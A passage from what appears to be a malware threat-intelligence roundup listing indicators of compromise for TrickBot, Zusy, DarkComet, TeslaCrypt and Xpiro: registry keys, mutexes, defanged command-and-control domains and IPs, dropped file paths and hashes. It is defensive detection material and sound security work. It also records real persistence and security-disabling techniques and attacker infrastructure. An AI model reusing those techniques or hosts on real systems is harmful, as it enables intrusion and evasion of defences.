249[.]5[.]55[.]69[.]in-addr[.]arpa 3 249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 3 249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 3 microsoft-com[.]mail[.]protection[.]outlook[.]com 3 microsoft[.]com 3 www[.]google[.]com 3 www[.]instagram[.]com 3 comcast[.]net 3 mx1a1[.]comcast[.]net 3 jotunheim[.]name 3 niflheimr[.]cn 3 whois[.]arin[.]net 2 whois[.]iana[.]org 2 mx-eu[.]mail[.]am0[.]yahoodns[.]net 2 aspmx[.]l[.]google[.]com 2 mta5[.]am0[.]yahoodns[.]net 2 icloud[.]com 2 cox[.]net 2 walla[.]com 2 hanmail[.]net 2 allstate[.]com 2 wp[.]pl 2 *See JSON for more IOCs Files and or directories created Occurrences %SystemRoot%\SysWOW64\config\systemprofile 3 %SystemRoot%\SysWOW64\config\systemprofile:.repos 3 %SystemRoot%\SysWOW64\fnwisxtv 1 %SystemRoot%\SysWOW64\airdnsoq 1 %SystemRoot%\SysWOW64\uclxhmik 1 %TEMP%\dnyabinr.exe 1 %TEMP%\lcxykqya.exe 1 %TEMP%\qzguacfj.exe 1 #### File Hashes  098ad43e2067c5c814cebe1fc52bdc528289c6a2cc96daf4e8bac90d1c95a0b3 2240525bf4ee830766ec33e2e3c0dfcdf871748088fcf068770fd306940c5957 693cd93fbc6bfb587ad011477ae870805725c5403260621a290f61bb0d243f47 a6b68aa5d00739401b413ed936526ea5e767824fddb4e768e03fb05dc369a6fd b9820bc7b09bfa88556efac463b7459d2f4a47f06cc953529a9782fdbefd4959 c2cb05d50c06d9ed65a7c53fb2f6b7977f2988f5fbbd928266bb8ea27723b243 d6df88c6f61812a4bb662abb8d90fb4ba7e17ae5b9351251d001b7945d7aae98 ec745df5a9e65776f76b97e9685ad86fbb130bb6a3146a7823bd94c7c6502f1d f3e93f62b4f4699a3d20e85fa3c9e8b7eb9129a15ca66720d4f677cae0c5a469 f8a2e41ea8ca0e998bcd54d8256cb538b1e32cec4e80eb810e8df003427b886b  #### Coverage Product Protection Secure Endpoint Cloudlock N/A CWS Email Security Network Security Stealthwatch N/A Stealthwatch Cloud N/A Secure Malware Analytics Umbrella WSA #### Screenshots of Detection #### Secure Endpoint #### Secure Malware Analytics #### MITRE ATT&CK ### Win.Dropper.TrickBot-9960840-0 #### Indicators of Compromise • IOCs collected from dynamic analysis of 36 samples Registry Keys Occurrences <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\USERDS  36 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS Value Name: 4334c972  36 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS Value Name: 2d17e659  36 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent3  7 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent5  5 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent9  4 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent6  4 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent7  3 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent2  3 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent1  3 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent8  3 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent0  2 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent4  2 Mutexes Occurrences 98b59d0b000000cc 36 98b59d0b00000120 36 Global\{2d17e659d34601689591} 36 98b59d0b00000174 36 98b59d0b00000150 36 98b59d0b00000158 36 98b59d0b000001ac 35 98b59d0b00000308 35 98b59d0b0000043c 35 98b59d0b000004b4 35 98b59d0b000001bc 35 98b59d0b000002ec 35 98b59d0b000001f0 35 98b59d0b000001c4 35 98b59d0b0000021c 35 98b59d0b0000025c 35 98b59d0b00000294 35 98b59d0b00000320 35 98b59d0b000003d4 35 98b59d0b000003f8 35 98b59d0b000004dc 35 98b59d0b0000060c 8 98b59d0b000005cc 8 98b59d0b000004f8 8 98b59d0b00000614 7 *See JSON for more IOCs IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 209[.]197[.]3[.]8 11 72[.]21[.]81[.]240 7 69[.]164[.]46[.]0 6 8[.]253[.]154[.]236/31 3 23[.]46[.]150[.]81 2 23[.]46[.]150[.]58 2 8[.]253[.]141[.]249 1 8[.]253[.]38[.]248 1 8[.]253[.]140[.]118 1 23[.]46[.]150[.]43 1 8[.]247[.]119[.]126 1 Domain Names contacted by malware. Does not indicate maliciousness Occurrences download[.]windowsupdate[.]com 36 adtejoyo1377[.]tk 36 Files and or directories created Occurrences %ProgramData%\c7150968.exe 1 %LOCALAPPDATA%\gusEBBF.tmp.bat 1 %ProgramData%\ba886437.exe 1 %HOMEPATH%\jfpDCC6.tmp.bat 1 %ProgramData%\63b007ed.exe 1 %HOMEPATH%\dtaE10F.tmp.bat 1 %ProgramData%\545ba94b.exe 1 %HOMEPATH%\hcv6907.tmp.bat 1 %ProgramData%\7afae1e8.exe 1 %HOMEPATH%\greA7E2.tmp.bat 1 %ProgramData%\9421c9aa.exe 1 %APPDATA%\vqpA923.tmp.bat 1 %ProgramData%\f779fb59.exe 1 %ProgramData%\xywA29.tmp.bat 1 %ProgramData%\940d0a1e.exe 1 %HOMEPATH%\jawD8CB.tmp.bat 1 %ProgramData%\a37667ce.exe 1 %HOMEPATH%\lkyB72F.tmp.bat 1 %ProgramData%\edcfad58.exe 1 %HOMEPATH%\pvf22C5.tmp.bat 1 %ProgramData%\182b8517.exe 1 %LOCALAPPDATA%\qsw15A4.tmp.bat 1 %ProgramData%\a3a20124.exe 1 %HOMEPATH%\xqh15A4.tmp.bat 1 %ProgramData%\a116e074.exe 1 *See JSON for more IOCs #### File Hashes  007a16c9f6908085a2d65e991ae691f41e7ceab17653200669b4286af82e8c12 017306c686a5a81630e746b9518106fd5e54b410b50a61f43cba7a3850b1fec8 024d73837dea32792852294b951dcb246c56442ebde4643cef6733f411f581b6 0284c0aff10ff3ca7e6078f3d8191fc9c4db42fbfb912a8cefabc937c1eca87d 02df9ec5bfb9e1bb613b5ee7d4a518bccc9f87580182f26d6e5d5a643036e3a1 03226228480f9e9d87a0370428d337023226314bd9447efccdbc03bb672ec81b 0337b9f06cda7d7a6e96ce2a29e0f004fb6df49d3b82d294a17a13604e754f86 03a89b1af244c7d20db8498d9284c20deea9462fb15db2f89b4c59a9be47c2f0 04432d06396fac85167c0a9dadf206dc50ea8527c29b943b77f192e45dbce22d 04679de514d8e3902341b314e324e6f75ba536d09da05e99958dc5b4a689de42 049f0322736b0abeec70630b9efbbd40d9a0916ce359a5a8168165d25a76e48f 04e819e635fc974afd4ee533b478841ba581ddcff254034fdbfea6522939ef5f 05b51b8179992a7e21259d9eacdaf8b1115e51056ec0104daddda5a0810f7126 0734ea55ac016a1e6b6ac40837883a684656eec9ce857351c9f99d3c965d6501 07e4ebd0b135dbfcf1e7d2b60386c9b52fa5d154d072a5689eb3a7a2b15112d6 08da477f7c363ddbc11224260717cf6f7f48e849cff403e25559529029b8fdf4 08e9ccb010aceac1ea0c0fbb41e58c8e2552b30de500bf43e298a645f5acedf7 097f9d7400b8a8c8bf5aa5339bf18359148a533f9136cd9b6279623e4db293d7 0bde820541632a300070601291eb1c478b9d09da2b405f740d6fe92b290a45de 0be2e49c02aa297d158bd5fe213a96584455fb4cea7c24dd100b9922df2a45c5 0bf64ebc68956ea9d73858f32530c20fab4243fb09320adfd500fb94842a9888 0c29c2763f311604136a06a99fa76ed09411572cd796021b60c66806e6c8e5a9 0c6b997f98a1e58caf5a16a90317d2cb1d2474ac5c5926f26fa2b14a9299638a 0d30d3c9cf63898bb2e970ec5a54dfe868fc5f519fd6b283bd00a2d22a01a653 0da6c492cc755852c07bf7511b774e2527dce42be420f602e9445f1bb760ad33  *See JSON for more IOCs #### Coverage Product Protection Secure Endpoint Cloudlock N/A CWS Email Security Network Security Stealthwatch N/A Stealthwatch Cloud N/A Secure Malware Analytics Umbrella N/A WSA N/A #### Screenshots of Detection #### Secure Endpoint #### Secure Malware Analytics #### MITRE ATT&CK ### Win.Trojan.Zusy-9960880-0 #### Indicators of Compromise • IOCs collected from dynamic analysis of 16 samples Registry Keys Occurrences <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH  12 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: MarkTime  12 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: Description  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: Type  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: Start  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: ErrorControl  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: ImagePath  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: DisplayName  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: WOW64  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: ObjectName  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: FailureActions  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU Value Name: MarkTime  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: Group  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: InstallTime  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF Value Name: Description  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF Value Name: Type  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF Value Name: Start  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF Value Name: ErrorControl  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF Value Name: DisplayName  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF Value Name: WOW64  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF Value Name: ObjectName  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF Value Name: FailureActions  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU Value Name: Description  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU Value Name: Type  1 Mutexes Occurrences 127.0.0.1:8000:Cdefgh 3 112.74.89.58:44366:Cdefgh 3 112.74.89.58:42150:Cdefgh 1 47.100.137.128:8001:Pqrstu 1 22.23.24.56:8001:Pqrstu 1 hz122.f3322.org:8001:Cdefgh 1 112.74.89.58:35807:Cdefgh 1 112.74.89.58:46308:Cdefgh 1 101.33.196.136:3389:Cdefgh 1 127.0.0.1:8001:Cdefgh 1 183.28.28.43:8001:Abcdef 1 IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 112[.]74[.]89[.]58 6 22[.]23[.]24[.]56 1 47[.]100[.]137[.]128 1 101[.]33[.]196[.]136 1 183[.]28[.]28[.]43 1 Domain Names contacted by malware. Does not indicate maliciousness Occurrences hz122[.]f3322[.]org 1 Files and or directories created Occurrences %SystemRoot%\svchost.exe 4 #### File Hashes  04fa031e5d2d86f8dbe0d3b95d67ea774448df4613e8acce79f0c9a30ef041bc 2444b744b5c06e9410ee5c3baa807569fde44c5092192428de935e03d25b1edb 466ca0805173034a7b12a5ffce104bbe5ed312e7441abdb98849ae4103150d04 5a755f07d3b90ac5a2041fd04fd764c40882dd20b50f91fddbc10b8c6341591d 5b53262a14fe1dcd42d670b0488d0de11aeb7cfa84e36acb4eec0c13b5fd2d73 5ca6b22c6e7de5f0b9437970f1f9360ad4f3a74f964eb319080e347c27c6dff9 6ea5fdaa95dbe09ccbc474ba4fc9fbe796e79c02d2b4f65f223feda5643f5400 86bd70bc7bb74d3d4991b0f1c7e15ddef1d09695b3940c5fb015f2d00ce5f558 b9b344bd7005b233cbb85395f61c309938fe70e2f8a8d0b2c24441ba074f9ca5 bea6c7b4117eb1f894d830c77ddf6d4424bccb6043d0f43c257522d253321c3e c0a8a6e606e46a970cefe81f269ec6aec2a538830c2f7e03cf0eac55b135a59a c968ae3cfbbd89673b49f6bfd474eea846bdb1e2e3a7c5376dbcda5290d445ed dfc315d962da82d84b54683a849edf4e7b16bb136dbc2eb1198d35e528920103 ec6cb8ff27e33d7e69ce02885baa9c08fd5a03349a16a52590353a4ec364c464 f240b80b34fa480dc7236ddecb5c326e719a094e49df5a6f2070712650553066 fd0e616e5ebb9075c44bb6772cf8b2c46801fafdb0716636850dc2ec0fe06f8c  #### Coverage Product Protection Secure Endpoint Cloudlock N/A CWS Email Security Network Security Stealthwatch N/A Stealthwatch Cloud N/A Secure Malware Analytics Umbrella N/A WSA #### Screenshots of Detection #### Secure Endpoint #### Secure Malware Analytics #### MITRE ATT&CK ### Win.Dropper.DarkComet-9961766-1 #### Indicators of Compromise • IOCs collected from dynamic analysis of 33 samples Registry Keys Occurrences <HKCU>\SOFTWARE\DC3_FEXEC  29 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Windows Debugger  24 <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON Value Name: UserInit  23 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: LanguageList  19 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: MicroUpdate  11 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: svchost.exe  7 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM Value Name: EnableLUA  5 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM  5 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE Value Name: EnableFirewall  4 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE Value Name: DisableNotifications  4 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER Value Name: AntiVirusDisableNotify  4 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM Value Name: DisableTaskMgr  3 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER Value Name: UpdatesDisableNotify  3 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC Value Name: Start  3 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM Value Name: DisableRegistryTools  3 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: rundll32  3 <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN Value Name: NoControlPanel  1 <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION  1 <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Microsoft  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Windows Updater  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Update  1 Mutexes Occurrences DC_MUTEX-<random, matching [A-Z0-9]{7}> 22 DCPERSFWBP 18 DC_MUTEX-5DND8AT 7 IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 99[.]229[.]175[.]244 1 Domain Names contacted by malware. Does not indicate maliciousness Occurrences pervert[.]no-ip[.]info 7 pervert2[.]no-ip[.]info 7 delvega[.]no-ip[.]org 2 wp-enhanced[.]no-ip[.]org 2 funstuff712[.]zapto[.]org 2 fflazhhf1[.]no-ip[.]org 1 darkcometss[.]no-ip[.]org 1 not4umac[.]no-ip[.]biz 1 sanderkidah[.]no-ip[.]org 1 bobolobob[.]no-ip[.]biz 1 hg-ma[.]zapto5[.]org 1 corrosivegas2010[.]zapto[.]org 1 profi555[.]no-ip[.]org 1 hg-ma[.]zapto[.]org 1 jugoboy1[.]zapto[.]org 1 hg-ma[.]zapto1[.]org 1 hg-ma[.]zapto2[.]org 1 hg-ma[.]zapto3[.]org 1 hg-ma[.]zapto4[.]org 1 jackreapez[.]zapto[.]org 1 magicmq[.]no-ip[.]org 1 kenrickm[.]no-ip[.]org 1 mrganja[.]no-ip[.]org 1 cherubi[.]no-ip[.]org 1 Files and or directories created Occurrences %APPDATA%\WinDbg 30 %APPDATA%\WinDbg\windbg.exe 29 %APPDATA%\dclogs 28 \svchost.exe 7 %TEMP%\uxcv9v 7 %TEMP%\uxcv9v.vbs 7 %HOMEPATH%\Documents\MSDCSC 6 %HOMEPATH%\Documents\MSDCSC\msdcsc.exe 6 %TEMP%\MSDCSC 5 %TEMP%\MSDCSC\msdcsc.exe 5 %SystemRoot%\SysWOW64\MSDCSC 3 %SystemRoot%\SysWOW64\MSDCSC\msdcsc.exe 3 %TEMP%\tMMjnM 1 %TEMP%\xMWbLz.vbs 1 %TEMP%\tMMjnM.vbs 1 %APPDATA%\WinDbg\msdnaa.exe 1 %TEMP%\Mi0z67 1 %HOMEPATH%\Documents\Explorer\Iexplorer.exe 1 %TEMP%\q7EVTk 1 %TEMP%\mmsHyU 1 %TEMP%\q7EVTk.vbs 1 %TEMP%\mmsHyU.vbs 1 %APPDATA%\WinUpd\WinUpdater.exe 1 %TEMP%\alRnXV 1 %TEMP%\alRnXV.vbs 1 *See JSON for more IOCs #### File Hashes  0153ea1e28f729d6604f422075202e48a599969c04c30e4a3056e3a308148eb3 050332edd1c7356a6e8a86471699135d90ba402d1f7ac0a27da39ccdb94ba0e8 07525015abc52c0820727bbfe3a29f62e1e5e0ca8af36ca8716ae5ea12e71a75 09fce07fb07b90dc54f5e72dd08d8677f62e948e6a0450e63f25cc6e22f99ff5 0a5710ed174fbee931562112147c3bf6cf8609a5f1674d0c878a6888548cb0c9 0db09a5cc0ff770b4024f14bf6b56b03c4ec599fe0499fc3a8d5da2625d93954 0f67c4df374d4e01f9838a7dc6ab174c0d8f4b5f2485b670f24c7fcdf65f3269 10f39ff02541b02857c11ca18a1cc745e075224ad510af7ad18b21dcb0d3cfa0 12449565aed227128301078ece7695cd6fbd8fb735e8f8b4238e08a1b181a651 13d377317be765d9d333e6a6d41bb83cffb606547dc308fefe0dcea87133b172 157be56d2b1cee72ad290957752e089cd39f39c51807c6791b25b875113758ab 15c65c639231d17726fa4a2c0cef2a7975a52f5d71ba8d7e4e3e1f053c066528 16cc7eabf5a54d8b376b6de32e2591902044a558ded0a527fcc0143e1686c4af 16e972675f3d1bd26aff1accdde7925e4cd5ba6d5f2a33826d3d75606a1bc955 173cae8d47a5d796b06fdd18c951003342ad08d0aee4be2823332df003b5673a 17dbbd57df81e29f2d19aba93c1626efe92bff713ad8b8e65b449e843aff54e8 19370c555e8e7ed5133ca6efa7acc98fc360983cc04193cc195ea0c8a0bf2931 1984c2439c1acacb9ec7c6468db48017d8c2aa4e2da5829d572bb6f5050e80cd 1b7a03db77e43e04badd95d28554df1f9e3d97197605af709df0387d3bd0c1e8 1b9f9491a6d98e3de499641caa8ac736f2c6f76e4ac8960170d89fea7026c69e 1bd9838e181acb88813cdea1d228b445e06b921bff3cece199f9551522eff27d 1cd35eff6c0963356162d68f5434b19728f2805db71b5c616ff534d2c961d093 1d25e1479054eea2355385f60a9ce320af2e5ff5ff1333bfabc72518f7337056 1f3c3ebac21a63328b72317246fb5731720e1d311cdb7928543e1c13e87994d3 2066531192b69556304df9a65266a2d2e5978ae8cec323b6860eb230fd2faa79  *See JSON for more IOCs #### Coverage Product Protection Secure Endpoint Cloudlock N/A CWS Email Security Network Security N/A Stealthwatch N/A Stealthwatch Cloud N/A Secure Malware Analytics Umbrella N/A WSA N/A #### Screenshots of Detection #### Secure Endpoint #### Secure Malware Analytics #### MITRE ATT&CK ### Win.Ransomware.TeslaCrypt-9960924-0 #### Indicators of Compromise • IOCs collected from dynamic analysis of 16 samples Registry Keys Occurrences <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM Value Name: EnableLinkedConnections  16 <HKU>\.DEFAULT\SOFTWARE\TRUEIMG  16 <HKCU>\SOFTWARE\TRUEIMG  16 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0 Value Name: CheckSetting  16 <HKCU>\SOFTWARE\TRUEIMG Value Name: ID  16 <HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'>  16 <HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'> Value Name: data  16 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _lfia  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _hfnk  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _kcgt  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _ppqk  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _kaol  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _abtg  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _rpua  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _raet  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _kwxa  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _ojsf  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _kiyk  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _iykv  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _hpdk  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _htkc  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _fshu  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _fanp  1 Mutexes Occurrences __xfghx__ 16 IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 74[.]220[.]199[.]6 16 64[.]190[.]63[.]111 16 Domain Names contacted by malware. Does not indicate maliciousness Occurrences prodocument[.]co[.]uk 16 marketathart[.]com 16 joshsawyerdesign[.]com 16 emmy2015[.]com 16 nlhomegarden[.]com 16 esbook[.]com 16 Files and or directories created Occurrences %ProgramFiles%\7-Zip\Lang\lv.txt 16 %ProgramFiles%\7-Zip\Lang\mk.txt 16 %ProgramFiles%\7-Zip\Lang\mn.txt 16 %ProgramFiles%\7-Zip\Lang\mng.txt 16 %ProgramFiles%\7-Zip\Lang\mng2.txt 16 %ProgramFiles%\7-Zip\Lang\mr.txt 16 %ProgramFiles%\7-Zip\Lang\ms.txt 16 %ProgramFiles%\7-Zip\Lang\nb.txt 16 %ProgramFiles%\7-Zip\Lang\ne.txt 16 %ProgramFiles%\7-Zip\Lang\nl.txt 16 %ProgramFiles%\7-Zip\Lang\nn.txt 16 %ProgramFiles%\7-Zip\Lang\pa-in.txt 16 %ProgramFiles%\7-Zip\Lang\pl.txt 16 %ProgramFiles%\7-Zip\Lang\ps.txt 16 %ProgramFiles%\7-Zip\Lang\pt-br.txt 16 %ProgramFiles%\7-Zip\Lang\pt.txt 16 %ProgramFiles%\7-Zip\Lang\ro.txt 16 %ProgramFiles%\7-Zip\Lang\ru.txt 16 %ProgramFiles%\7-Zip\Lang\sa.txt 16 %ProgramFiles%\7-Zip\Lang\si.txt 16 %ProgramFiles%\7-Zip\Lang\sk.txt 16 %ProgramFiles%\7-Zip\Lang\sl.txt 16 %ProgramFiles%\7-Zip\Lang\sq.txt 16 %ProgramFiles%\7-Zip\Lang\sr-spc.txt 16 %ProgramFiles%\7-Zip\Lang\sr-spl.txt 16 *See JSON for more IOCs #### File Hashes  00e862ecba1e2a71769a67fc5c27499e00c5594f6b7ed4e4114c2fe1fb43492f 144c480ed69ac652c4eb4efa5b6038d7a68ed3bca67089997b4228e1c814f7c4 1b02123c913912f44a6ef1c3c4a5a008270d9d8e802e92b4baa259135f25dc21 22f322c8241b4860c066f5ae57115c58f373753e3d8c9bede4521e5a5ed85e65 35aeb94c99b948b122f3e4bd4298107ab15cb8bbdb11b533d32666dbb1455ae3 3ba05e043bf3148202f498dcddb6bd67680f76640aef2d08f9ae1272ff85e719 41cba3025ecc75863b7a836ee00fdf2bbc2df90dffb17541b5bb1c9fcb269bd1 9223631593b46b54450b76028a69ddd837d06cd7e9b3d8e3f7bd584a46af22bf b2713458d2c3ebd4b558f8c2ce19a90bd97095ca868fd499755bf1c9cbd0c388 bdf2c5fcf72e7d7870e81ffacdd01206ed98d2446a85c28e7eaf73e26d7a6eda be9fac828e64c19e0a3fbf3c4a752d5332b7c0b849556f5388645515a29538ee c00039c0454935a5079dc801ce4420457eb9964cbed8372b5aff5c60a45fa26c d540b31f009a4138b5d35735fa9976522f4d5ee9e6b8dbdbde479796ebc6d4c0 dba60ef1804b4d90d74a2988fe53f044d7619f469d0ba9660e5646a1a67439cd f1ab2d7ace4656b5f3770186d088ac0644482fe43f38fe2bdb9217744d0f58c1 ff6f821dc0526f3615b1a3c37b2b14094f53d05cb0a6a753cb257cb0bcde6898  #### Coverage Product Protection Secure Endpoint Cloudlock N/A CWS Email Security Network Security Stealthwatch N/A Stealthwatch Cloud N/A Secure Malware Analytics Umbrella WSA #### Screenshots of Detection #### Secure Endpoint #### Secure Malware Analytics #### MITRE ATT&CK ### Win.Virus.Xpiro-9960895-1 #### Indicators of Compromise • IOCs collected from dynamic analysis of 23 samples Registry Keys Occurrences <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32 Value Name: Type  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64 Value Name: Type  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32 Value Name: Type  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32 Value Name: Start  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP Value Name: Type  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP Value Name: Start  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE Value Name: Type  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE Value Name: Start  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE Value Name: Type  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE Value Name: Start  23 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500  23 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500 Value Name: EnableNotifications  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32 Value Name: Start  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64 Value Name: Start  23 <HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE Value Name: AccumulatedWaitIdleTime  23 <HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE Value Name: RootstoreDirty  23 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE Value Name: AccumulatedWaitIdleTime  23 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE Value Name: RootstoreDirty  23 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC Value Name: Start  22 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64 Value Name: Type  22 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64 Value Name: Start  22 